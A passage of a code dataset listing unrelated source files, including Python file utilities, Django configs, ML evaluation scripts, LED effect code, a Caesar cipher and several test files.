+{"seq_id":"267648853","text":"import os\nimport csv\nimport zipfile\nimport numpy as np\nimport pandas as pd\nimport logging\nimport traceback\n\n\nclass FileUtil:\n    \"\"\"\n    ファイルのUtilクラス\n    \"\"\"\n    \n    @staticmethod\n    def check_file_exist(filepath):\n        \"\"\"\n        ファイル/フォルダの存在を確認\n        \n        Parameters\n        ----------\n        filepath: string\n            ファイルパス\n        \n        Returns\n        ----------\n        TRUE/FALSE\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            if os.path.isfile(filepath):\n                return True\n            else:\n                return False\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"ファイル/フォルダのチェック中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n    \n    @staticmethod\n    def read_csv_file_by_std(filepath):\n        \"\"\"\n        標準ライブラリでcsvファイルから読み込み\n        \n        Parameters\n        ----------\n        filepath: string\n            ファイルパス\n        \n        Returns\n        ----------\n        numpy_data: ndarray\n            numpyデータ\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            with open(filepath, newline='') as csvfile:\n                csv_reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n                # 全行を読み込んでから ndarray に変換する(1行ずつ上書きすると最終行しか返らない)\n                rows = [row for row in csv_reader]\n                numpy_data = np.array(rows)\n                return numpy_data\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"標準ライブラリでcsvファイルを読み込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n    \n    @staticmethod\n    def read_csv_file_by_numpy(filepath, value=None):\n        \"\"\"\n        numpyでcsvファイルから読み込み\n        \n        Parameters\n        ----------\n        filepath: string\n            ファイルパス\n        value: variable\n            補完値\n        \n        Returns\n        ----------\n        numpy_data: ndarray\n            numpyデータ\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            numpy_data = np.genfromtxt(filepath, delimiter=\",\", filling_values=value)\n            return numpy_data\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"numpyでcsvファイルを読み込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n\n    @staticmethod\n    def read_csv_file_by_pandas(filepath):\n        \"\"\"\n        pandasでcsvファイルから読み込み\n        \n        Parameters\n        ----------\n        filepath: string\n            ファイルパス\n        \n        Returns\n        ----------\n        pandas_data: DataFrame\n            pandasデータ\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            pandas_data = pd.read_csv(filepath, delimiter=\",\", header=None)\n            return pandas_data\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"pandasでcsvファイルを読み込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n\n    @staticmethod\n    def read_zip_file_by_std(execPath, filename):\n        \"\"\"\n        標準ライブラリでzipファイルから解凍せずに読み込む\n        \n        Parameters\n        ----------\n        execPath: string\n            実行パス\n        filename: string\n            ファイル名\n        \n        Returns\n        ----------\n        numpy_data: ndarray\n            numpyデータ\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            numpy_data = None  # 読み込んだ行を蓄積する(最初の行を読むまでは None)\n            with zipfile.ZipFile(execPath + '/' + filename, 'r') as post:\n                for info in post.infolist():\n                    # ファイルパスでスキップ判定\n                    if not os.path.isfile(execPath + '/' + info.filename):\n                        continue\n\n                    file_data = post.read(info.filename).decode('utf-8')\n                    for row in file_data.split('\\n'):\n                        if numpy_data is None:\n                            numpy_data = np.array(row)\n                        else:\n                            numpy_data = np.vstack((numpy_data, np.array(row)))\n            return numpy_data\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"zipファイルから読み込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n    \n    @staticmethod\n    def write_csv_file_by_std(numpy_data, filepath):\n        \"\"\"\n        標準ライブラリでcsvファイルへ書き込み\n        \n        Parameters\n        ----------\n        numpy_data: ndarray\n            numpyデータ\n        filepath: string\n            ファイルパス\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            with open(filepath, 'w') as csvfile:\n                writer = csv.writer(csvfile, lineterminator='\\n') # 改行コード(\\n)を指定しておく\n                writer.writerows(numpy_data)\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"標準ライブラリでcsvファイルへ書き込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n\n    @staticmethod\n    def write_csv_file_by_numpy(numpy_data, filepath):\n        \"\"\"\n        numpyでcsvファイルへ書き込み\n\n        Parameters\n        ----------\n        numpy_data: ndarray\n            numpyデータ\n        filepath: string\n            ファイルパス\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            np.savetxt(filepath, numpy_data, delimiter=\",\")\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"numpyでcsvファイルへ書き込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n\n    @staticmethod\n    def write_csv_file_by_pandas(pandas_data, filepath):\n        \"\"\"\n        pandasでcsvファイルへ書き込み\n\n        Parameters\n        ----------\n        pandas_data: DataFrame\n            pandas出力データ\n        filepath: string\n            ファイルパス\n\n        Raises\n        ----------\n        TypeError\n            誤った引数の型が指定された場合\n        Exception\n            その他例外が発生した場合\n        \"\"\"\n\n        try:\n            pandas_data.to_csv(filepath)\n        except TypeError:\n            logging.error(\"引数の型が間違っています。\")\n            raise TypeError\n        except:\n            logging.error(\"pandasでcsvファイルへ書き込み中に予期しない例外が発生しました。\")\n            traceback.print_exc()\n            raise Exception\n","sub_path":"python_pj/utils/FileUtil.py","file_name":"FileUtil.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"106673135","text":"# -*- coding: utf8 -*-\n\nimport json\nimport os\n\nimport settings\n\n\ndef load_data(file_name, directory=None):\n    if directory is None:\n        directory = settings.DATA_DIRECTORY\n\n    obj = None\n    try:\n        with open(os.path.join(directory, file_name)) as fp:\n            obj = fp.read()\n    except IOError:\n        pass\n\n    return json.loads(obj) if obj else {}\n\n\ndef save_data(file_name, obj_to_save, directory=None):\n    if directory is None:\n        directory = settings.DATA_DIRECTORY\n\n    with open(os.path.join(directory, file_name), 'w') as fp:\n        if hasattr(obj_to_save, 'serialize'):\n            fp.write(json.dumps(obj_to_save.serialize()))\n        else:\n            fp.write(json.dumps(obj_to_save))\n\n\ndef data_exists(file_name, directory=None):\n    if directory is None:\n        directory = settings.DATA_DIRECTORY\n    return os.path.isfile(os.path.join(directory, file_name))\n","sub_path":"tool/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"183695803","text":"# coding: utf8\n\nimport json\nimport os\nimport shutil\n\nimport pytest\n\n\n@pytest.fixture(\n    params=[\n        \"train_image_ae\",\n        \"train_patch_ae\",\n        
\"train_roi_ae\",\n \"train_slice_ae\",\n ]\n)\ndef cli_commands(request):\n if request.param == \"train_image_ae\":\n mode = \"image\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_image.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n elif request.param == \"train_patch_ae\":\n mode = \"patch\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_patch.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n elif request.param == \"train_roi_ae\":\n mode = \"roi\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_roi.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n elif request.param == \"train_slice_ae\":\n mode = \"slice\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_slice.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n else:\n raise NotImplementedError(\"Test %s is not implemented.\" % request.param)\n\n return test_input, mode\n\n\ndef test_train(cli_commands):\n if os.path.exists(\"results\"):\n shutil.rmtree(\"results\")\n\n test_input, mode = cli_commands\n if os.path.exists(\"results\"):\n shutil.rmtree(\"results\")\n flag_error = not os.system(\"clinicadl \" + \" \".join(test_input))\n assert flag_error\n with open(os.path.join(\"results\", \"maps.json\"), \"r\") as f:\n json_data = json.load(f)\n assert json_data[\"mode\"] == mode\n\n shutil.rmtree(\"results\")\n","sub_path":"tests/test_train_ae.py","file_name":"test_train_ae.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"10585084","text":"import asyncio\n\nfrom aiohttp import web\n\nimport logic\n\npoemtryMachine = logic.getPoemtryJson()\n\nasync def job(request):\n text = next(poemtryMachine)\n return web.Response(body=text.encode('utf-8'))\n\nasync def init(loop):\n app = web.Application(loop=loop)\n app.router.add_route('GET', '/job', job)\n srv = await loop.create_server(app.make_handler(), '127.0.0.1', 8000)\n print('Server started at http://127.0.0.1:8000...')\n return srv\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(init(loop))\nloop.run_forever()\n","sub_path":"python-server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180729978","text":"from renderers.teensy import serial_constants\nimport utils\n\nclass EffectManager(object):\n\n def __init__(self, nlights=serial_constants.TOTAL_LEDS):\n self.nlights = nlights #total number of LEDs\n a = list(range(self.nlights)) #list with index number for every led\n self.lightDict = dict.fromkeys(a) #dictionary {ledIndex: color}\n\n #LED indices for 8 separate segments\n g = [200, 420, 540, 660, 865, 1071, 1192]\n s0 = list(range(0,g[0]))\n s1 = list(range(g[0],g[1]))\n s2 = list(range(g[1],g[2]))\n s3 = list(range(g[2],g[3]))\n s4 = list(range(g[3],g[4]))\n s5 = list(range(g[4],g[5]))\n s6 = list(range(g[5],g[6]))\n s7 = list(range(g[6],self.nlights))\n\n\n #dictionary containing indices for leds in all segments\n self.sectionsDict = {0:s0, 1:s1, 2:s2, 3:s3, 4:s4, 5:s5, 6:s6, 7:s7}\n\n #make all the LEDs in one section one color\n def colorSections(self, sectionList, 
color):\n        for sectionNum in sectionList:\n            for ledNum in self.sectionsDict[sectionNum]:\n                self.lightDict[ledNum] = color\n\n    #make all the LEDs in half a section one color\n    #sectionTupleList should be (sectionNum, 0 or 1) 0 or 1 for different halves\n    def colorHalfSections(self, sectionTupleList, color):\n        for sectionNum,half in sectionTupleList:\n            count = 0\n            for ledNum in self.sectionsDict[sectionNum]:\n                if count < len(self.sectionsDict[sectionNum])//2 and half == 0:\n                    self.lightDict[ledNum] = color\n                elif count > len(self.sectionsDict[sectionNum])//2 and half == 1:\n                    self.lightDict[ledNum] = color\n\n                count = count + 1\n\n    #turns every 3rd LED in a section on for a strobe effect\n    def strobeSection(self, sectionList):\n        for sectionNum in sectionList:\n            for ledNum in self.sectionsDict[sectionNum]:\n                if ledNum % 3 == 0:\n                    self.lightDict[ledNum] = utils.hsv_to_rgb(1, 0, 1)\n\n    def toByteArray(self):\n        output = []\n        for k,v in self.lightDict.items():\n            if v is not None:\n                x = 'L'.encode()\n                output.append(x)\n                i0 = k & 255 #low order bits\n                i1 = (k & 65280) >> 8 #high order bits\n                output.append(i0)\n                output.append(i1)\n                output.append(v[0])\n                output.append(v[1])\n                output.append(v[2])\n        return bytearray(output)\n\n    def get_light_Dict(self):\n        return self.lightDict\n\n#Generates a moving \"snake\" of light; length, velocity, and time of existence\n#can be specified\nclass snake(object):\n    def __init__(self, color, nlights=serial_constants.TOTAL_LEDS, start = 0,\n                 length = 1, velocity = 1, duration = 100, fade = True):\n        self.nlights = nlights #total number of LEDs\n        a = list(range(start, start+length)) #list with index number for leds in snake\n        self.lightDict = dict.fromkeys(a) #dictionary {ledIndex: color}\n        self.velocity = velocity\n        self.length = length\n        self.deathIndex = start + duration\n\n        if fade:\n            count = 0\n            for i in self.lightDict.keys():\n                #dim_hex_color is expected to be provided by the surrounding package\n                c = dim_hex_color(color, 1-count*0.05)\n                self.lightDict[i] = c #use the dimmed color, not the original one\n                count = count + 1\n        else:\n            for i in self.lightDict.keys():\n                self.lightDict[i] = color\n\n\n    #moves the snake, start and deathIndex should not require overlapping from\n    #the last index in the LED array to the 0th.\n    def update(self):\n        #rebuild the dict instead of mutating it while iterating;\n        #LEDs that would move past deathIndex are dropped\n        moved = {}\n        for i, c in self.lightDict.items():\n            if i+self.velocity < self.deathIndex:\n                moved[i+self.velocity] = c\n        self.lightDict = moved\n\n    def get_light_Dict(self):\n        return self.lightDict\n","sub_path":"lib/renderers/teensy/light_effect_manager.py","file_name":"light_effect_manager.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"108766017","text":"from sympy import binomial\nfrom itertools import product\n\nif __name__ == \"__main__\":\n    n_upper = int(input())\n    binomial_lower = int(input())\n    \n    counter = len({\n        (n,r) for n,r in product(range(n_upper + 1), repeat=2) \n        if binomial(n,r) > binomial_lower \n    })\n    \n    print(counter)","sub_path":"51-60/p53.py","file_name":"p53.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"637594222","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import Profile\n\n\n@admin.register(Profile)\nclass AdminProfile(admin.ModelAdmin):\n    list_display = (\n        'usuario',\n        'clave_rh',\n        'clave_jde',\n        'foto',\n        'fecha_nacimiento',\n        
)\n","sub_path":"seguridad/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"78081346","text":"from django.urls import path, re_path\nfrom app import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('signup/', views.signup, name='signup'),\n path('signin/', views.signin, name='signin'),\n path('disconnect/', views.disconnect, name=\"disconnect\"),\n path('contact/', views.contact, name='contact'),\n re_path(r'^gig_detail/(?P[0-9]+)/$', views.gig_detail, name='gig_detail'),\n path('gig_mygigs/', views.gig_mygigs, name='gig_mygigs'),\n path('gig_create/', views.gig_create, name=\"gig_create\"),\n re_path(r'^gig_edit/(?P[0-9]+)/$', views.gig_edit, name='gig_edit'),\n re_path(r'^gig_search/$', views.gig_search, name='gig_search'),\n re_path(r'^profile/(?P\\w+)/$', views.profile, name='profile'),\n path('account/', views.account, name='account'),\n re_path(r'^personal_info/(?P\\w+)/$', views.personal_info, name='personal_info'),\n\n path('ajax/load-cities/', views.load_cities, name='ajax_load_cities'), # AJAX\n path('ajax/load-localities/', views.load_localities, name='ajax_load_localities'), # AJAX\n path('ajax/load-areas/', views.load_areas, name='ajax_load_areas'), # AJAX\n path('ajax/load-subareas/', views.load_subareas, name='ajax_load_subareas'), # AJAX\n]","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"130200057","text":"import xlrd\nimport os\nimport shutil\nimport pandas as pd\nimport numpy as np\nfrom utils import quadratic_weighted_kappa, kappa_confusion_matrix, AverageMeter\nfrom sklearn.metrics import confusion_matrix\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='kappa3_ratio')\n parser.add_argument('--csvfile', required=True)\n parser.add_argument('--error_output', required=True)\n return parser.parse_args()\n\nargs = parse_args()\n\nroot = '/media/weidong/weidong/12.15质检图片'\nxls_file = os.path.join(root, '3_分级2017.05.01_2017.12.01.xls')\n# pred_csv = os.path.join(root, '3/Save/result.csv')\npred_csv = os.path.join(root, args.csvfile)\nprint(xls_file)\n\ndata = xlrd.open_workbook(xls_file)\n\ntable = data.sheets()[0]\n\nnrows = table.nrows\n\ndict_gt = {}\n\nfor i in range(1, nrows):\n try:\n row = table.row_values(i)\n name = str(int(row[0]))\n level = str(int(row[4]))\n dict_gt[name+'.jpg'] = int(row[4])\n except:\n continue\n\ndict_pred = {}\n\ndf = pd.DataFrame.from_csv(pred_csv)\nfor index, row in df.iterrows():\n dict_pred[row['image']] = row['dr_level']\n\nlist_gt = []\nlist_pred = []\n\n# make dir\nroot_error = os.path.join(root, args.error_output)\nos.makedirs(root_error, exist_ok=True)\nfor i in range(5):\n for j in range(5):\n tmp_dir = os.path.join(root_error, 'gt_{}_pred_{}'.format(i, j))\n os.makedirs(tmp_dir, exist_ok=True)\n\n\nfor key in dict_pred.keys():\n list_gt.append(dict_gt[key])\n list_pred.append(dict_pred[key])\n if (dict_gt[key] != dict_pred[key]):\n src_file = os.path.join(root, '3/Save/{}'.format(key))\n dst_file = os.path.join(root_error, 'gt_{}_pred_{}'.format(dict_gt[key], dict_pred[key]))\n shutil.copy(src_file, dst_file)\n print('copy from {} to {}'.format(src_file, dst_file))\n\nprint(len(list_pred))\nprint(len(list_gt))\n\nnp_gt = np.array(list_gt)\nnp_pred = np.array(list_pred)\n\ndr_kappa = 
quadratic_weighted_kappa(np_gt, np_pred)\n\ndr_confusion_matrix = str(confusion_matrix(np_gt, np_pred))\n\nout_file = os.path.join(root, 'kappa3.txt')\n\nwith open(out_file, 'w') as f:\n f.write('====>kappa: {}\\n'.format(dr_kappa))\n f.write('===> Confusion Matrix:\\n')\n f.write(dr_confusion_matrix)\n f.write('\\n\\n')\n","sub_path":"tmp1/kappa3_ratio.py","file_name":"kappa3_ratio.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"24604083","text":"import sys\nfrom optparse import OptionParser\n\n\ndef simpleParseCallbackKeywords(option, opt, value, parser):\n setattr(parser.values, option.dest, value.split(','))\n\n\ndef simpleParseOptions():\n parser = OptionParser()\n parser.add_option('-q', '--quiet', action='store_false',\n dest=\"verbose\", default=True)\n parser.add_option('-j', action='store_true', dest=\"join\", default=False)\n parser.add_option('-k', '--keywords', action=\"callback\", type=\"string\",\n dest=\"keywords\", callback=simpleParseCallbackKeywords)\n return parser\n\n\ndef simpleParseInput(args):\n parser = simpleParseOptions()\n (options, args) = parser.parse_args()\n print(\"Verbose: {verbose}\".format(verbose=options.verbose))\n print(\"Options: {join}\".format(join=options.join))\n print(\"Keywords: {keywords}\".format(keywords=options.keywords))\n\nsimpleParseInput(sys.argv)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258812182","text":"import Movie\nimport requests, base64, hashlib, json\nfrom datetime import date\nfrom settings import *\n\n\nclass Person:\n \n\n def __init__(self, code):\n self.parameters = code\n self.code = code[\"code\"]\n \n if \"picture\" in code:\n self.picture = code[\"picture\"][\"href\"]\n else:\n self.picture = \"\"\n\n if \"name\" in code:\n self.name = code[\"name\"]\n else:\n self.name = \"\"\n\n if \"gender\" in code:\n if code[\"gender\"] == 2:\n self.gender = \"woman\"\n else:\n self.gender = \"man\"\n else:\n self.gender = \"\"\n\n if \"birthDate\" in code:\n d = datetime.strptime(code[\"birthDate\"], '%Y-%m-%d')\n self.birthDate = d.strftime('%d/%m/%Y')\n else:\n self.birthDate = \"\"\n\n if \"nationality\" in code:\n self.nationality = code[\"nationality\"][0][\"$\"]\n else:\n self.nationality = \"\"\n\n if \"realName\" in code:\n self.realName = code[\"realName\"]\n else:\n self.realName = \"\"\n\n if \"link\" in code:\n self.link = code[\"link\"][0][\"href\"]\n else:\n self.link = \"\"\n \n if \"activity\" in code:\n self.activity = []\n for a in code[\"activity\"]:\n self.activity.append(a[\"$\"])\n else:\n self.activity = []\n\n \n def __unicode__(self):\n return self.realName\n\n\n def getFilmography(self, profile = DEFAULT_PROFILE):\n \n qry = str(self.code)\n count = \"1\"\n \n headers = {\"User-Agent\":\"Dalvik/1.6.0 (Linux; U; Android 4.2.2; Nexus 4 Build/JDQ39E)\"}\n url = \"http://api.allocine.fr/rest/v3/filmography\"\n sed = str(date.today().strftime(\"%Y%m%d\"))\n sig = hashlib.sha1(SECRET_KEY + \"partner=\"+PARTNER_CODE+\"&code=\"+qry.replace(\" \",\"+\")+\"&format=json&filter=person&count=\" + str(count) + '&sed=' + sed).digest().encode(\"base64\").replace(\"\\n\",\"\").replace(\"+\", \"%2B\").replace(\"=\", \"%3D\").replace(\"/\", \"%2F\")\n url += '?' 
+ \"partner=\"+PARTNER_CODE+\"&code=\"+qry.replace(\" \",\"+\") + \"&format=json&filter=person&count=\" + str(count) + '&sed=' + sed + '&sig=' + sig\n \n e = requests.get(url, headers=headers).text\n d = json.loads(e)[\"person\"][\"participation\"]\n \n filmography = []\n for i in d:\n movie = {}\n if \"movie\" in i:\n \n movie[\"title\"] = i[\"movie\"][\"title\"]\n movie[\"productionYear\"] = i[\"movie\"][\"productionYear\"]\n movie[\"activity\"] = i[\"activity\"][\"$\"]\n \n if \"role\" in i:\n movie[\"role\"] = i[\"role\"]\n else:\n movie[\"role\"] = \"\"\n \n filmography.append(movie)\n \n return filmography\n \n","sub_path":"allocine/Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"199840751","text":"import os\n\n\ndef excuteLtp(cmdline, inputFoler, outputFolder):\n n = 0\n for parents, folders, filenames in os.walk(inputFoler):\n for filename in filenames:\n inputFile = os.path.join(inputFoler, filename)\n outputFile = os.path.join(outputFolder, filename)\n if os.path.exists(outputFile)!=True:\n n+=1\n\n newCmdLine = cmdline + \" -in \" + inputFile + \" -out \" + outputFile\n os.system(newCmdLine)\n\n\n\nif __name__ == '__main__':\n\n niuParserPath = r\"H://NiuParser-v1.3.0-win//bin\"\n model_exe = \"//NiuParser-v1.3.0-mt-win.exe\"\n model_action = [ \" --POS \",\" --CP \", \" --DP \"]\n model_config = \" -c niuparser.config \"\n\n os.chdir(niuParserPath)\n\n\n # year = str(2015)\n # niuparseFolder = os.path.join(\"/home/nankang/Desktop/nianbao\", \"niuparser_\" + year)\n # if os.path.exists(niuparseFolder):\n # print(\"exists\")\n # else:\n # os.makedirs(niuparseFolder)\n\n # version = \"version_\" + \"3\"\n # fenlei = \"v3_1\"\n # input_pos_folder = os.path.join(\"/home/nankang/Desktop/cws\", year+\"_\"+version+\"_cws\")\n # output_cws_folder = os.path.join(niuparseFolder, version + \"_ws\",fenlei)\n # input_pos_folder = output_cws_folder\n # output_pos_folder = os.path.join(niuparseFolder, version + \"_pos\")\n # input_cp_folder = input_pos_folder\n # output_cp_folder = os.path.join(niuparseFolder, version + \"_cp\")\n # input_dp_folder = input_pos_folder\n # output_dp_folder = os.path.join(niuparseFolder, version + \"_dp\")\n\n # if os.path.exists(output_cws_folder):\n # print(\"exists\")\n # else:\n # os.mkdir(output_cws_folder)\n # if os.path.exists(output_pos_folder):\n # print(\"exists\")\n # else:\n # os.makedirs(output_pos_folder)\n # if os.path.exists(output_cp_folder):\n # print(\"exists\")\n # else:\n # os.makedirs(output_cp_folder)\n # if os.path.exists(output_dp_folder):\n # print(\"exists\")\n # else:\n # os.makedirs(output_dp_folder)\n\n # cmdline = model_exe+threads_num+last_stage\n # cmdline_cws = \"/home/hadoop1/desktop/NiuParser-v1.3.0-linux/bin/\"+model_exe + model_action[0] + model_config\n cmdline_pos = niuParserPath+model_exe + model_action[0] + model_config\n cmdline_cp = niuParserPath+model_exe + model_action[1] + model_config\n cmdline_dp = niuParserPath+model_exe + model_action[2] + model_config\n # excuteLtp(cmdline_cws, input_cws_folder, output_cws_folder)\n # excuteLtp(cmdline_pos, input_pos_folder, output_pos_folder)\n # excuteLtp(cmdline_cp, input_cp_folder, output_cp_folder)\n # excuteLtp(cmdline_dp, input_dp_folder, output_dp_folder)\n # newCmdLine = cmdline + \" -in \" + inputFile + \" -out \" + outputFile\n inputFile='H://hanyu//hanyu_output_pos.txt'\n # file = open(inputFile,'r')\n # s = file.read()\n # print(s)\n # 
file.close()\n outputFile='H://hanyu//hanyu_output_dp.txt'\n # if os.path.exists(outputFile):\n # print(\"exists\")\n # else:\n # os.makedirs(outputFile)\n # excuteLtp(cmdline_cp, inputFile, outputFile)\n newCmdLine=cmdline_dp+\" -in \" + inputFile + \" -out \" + outputFile\n os.system(newCmdLine)\n","sub_path":"NiuParse-linux.py","file_name":"NiuParse-linux.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"165175363","text":"from pyats.utils.fileutils import FileUtils\nfrom pyats.aetest import Testcase, test\n\n\nclass Smoke(Testcase):\n\n @test\n def copy_from(self, env):\n with FileUtils(testbed=env) as futils:\n futils.copyfile(\n source='scp://rrr//home/adminaccount/slavik/3.txt',\n destination='/home/jsakhno/github/pyatsTraining/homeworks/yaroslav_sakhno/hw03')\n\n @test\n def copy_to(self,env):\n with FileUtils(testbed=env) as futils:\n futils.copyfile(\n source='/home/jsakhno/github/pyatsTraining/homeworks/yaroslav_sakhno/hw03/2.txt',\n destination='scp://rrr//home/adminaccount/slavik')\n","sub_path":"homeworks/yaroslav_sakhno/hw03/test_copy.py","file_name":"test_copy.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"310277346","text":"import string\n\n\ndef main():\n try:\n input_file_name = input('Input file name: ')\n output_file_name = input('Output file name: ')\n mode = int(input('1 - encrypt\\n2 - decrypt\\nMake your choice: '))\n key = get_key(mode, int(input('Input key: ')))\n original_str = read_from_file(input_file_name)\n modified_str = encrypt_string(original_str, key)\n write_to_file(output_file_name, modified_str)\n except FileNotFoundError:\n print('There is no such file!')\n except ValueError:\n print('Illegal key or mode format')\n\n\ndef read_from_file(input_file_name):\n with open(input_file_name, 'r') as r:\n input_str = r.read()\n return input_str\n\n\ndef write_to_file(output_file_name, out_str):\n with open(output_file_name, 'w') as w:\n w.write(out_str)\n\n\ndef get_key(mode, key_of_encryption):\n if mode == 2:\n key_of_encryption = -key_of_encryption\n elif mode != 1:\n raise ValueError('Illegal mode parameter...')\n return key_of_encryption\n\n\ndef encrypt_string(input_string, key):\n a = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n symbols = a + \" \" + a.upper() + string.ascii_letters + string.digits + string.punctuation\n encrypted_string, length_symbols = \"\", len(symbols)\n for input_char in input_string:\n found_char_index = symbols.find(input_char)\n if found_char_index == -1:\n encrypted_string += input_char\n else:\n new_index = (found_char_index + key) % length_symbols\n encrypted_string += symbols[new_index]\n\n return encrypted_string\n","sub_path":"Encrypt_String.py","file_name":"Encrypt_String.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"319062483","text":"import random\nimport logging\n\nfrom axilent import handlers, dicts\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass DictAxiTest(object):\n '''\n Wraps a test with prepare and check methods with a test that\n exposes make_input_data and check_output_data methods.\n '''\n\n def __init__(self, axi_test, terminate_early=False):\n self.axi_test = axi_test\n self.handler = handlers.DictCommandHandler()\n self.terminate_early = terminate_early\n\n def make_input_data(self):\n input_data = [{\n 
'reset': 1,\n 'm2s': dicts.make_empty_axi4lite_m2s_dict(),\n 's2m': dicts.make_empty_axi4lite_s2m_dict(),\n }]\n self.axi_test.prepare(self.handler)\n m2s = self.handler.make_command_dicts()\n input_data += [{\n 'reset': 0,\n 'm2s': d,\n 's2m': dicts.make_empty_axi4lite_s2m_dict(),\n } for d in m2s]\n if self.terminate_early:\n input_data = input_data[:random.randint(1, len(input_data))]\n return input_data\n\n def check_output_data(self, input_data, output_data):\n if not self.terminate_early:\n response_dicts = [d['s2m'] for d in output_data[1:]]\n self.handler.consume_response_dicts(response_dicts)\n self.axi_test.check()\n","sub_path":"axilent/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"604432332","text":"import re\nimport subprocess # noqa: F401\n\nimport pytest\nimport yaml\nfrom click.testing import CliRunner\nfrom kedro.framework.cli.cli import info\nfrom kedro.framework.session import KedroSession\nfrom kedro.framework.startup import bootstrap_project\n\nfrom kedro_mlflow.framework.cli.cli import init as cli_init\nfrom kedro_mlflow.framework.cli.cli import mlflow_commands as cli_mlflow\nfrom kedro_mlflow.framework.cli.cli import ui as cli_ui\nfrom kedro_mlflow.framework.context import get_mlflow_config\n\n\ndef 